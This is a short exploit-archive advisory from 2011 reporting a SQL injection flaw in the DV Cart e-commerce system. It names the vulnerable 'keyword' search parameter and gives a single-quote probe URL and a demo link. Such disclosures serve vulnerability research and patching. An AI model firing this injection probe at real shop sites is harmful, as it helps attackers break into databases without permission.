19 lines
No EOL
480 B
Text
19 lines
No EOL
480 B
Text
# Exploit Title: DV Cart (E-Commerce System) SQL Injection
|
|
# Date: 19.08.2011
|
|
# Author: Eyup CELIK
|
|
# Software Link: http://www.esmistudio.com
|
|
# Version: All Version
|
|
# Tested on: All versions are Vulnerability
|
|
|
|
ISSUE
|
|
|
|
SQL Injection can be done using the command input
|
|
|
|
Example
|
|
index.php?keyword=<SQL Injection Code>&mod=search&submit=GO
|
|
|
|
Exploit:
|
|
index.php?keyword='1&mod=search&submit=GO
|
|
|
|
Demo:
|
|
http://site.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO |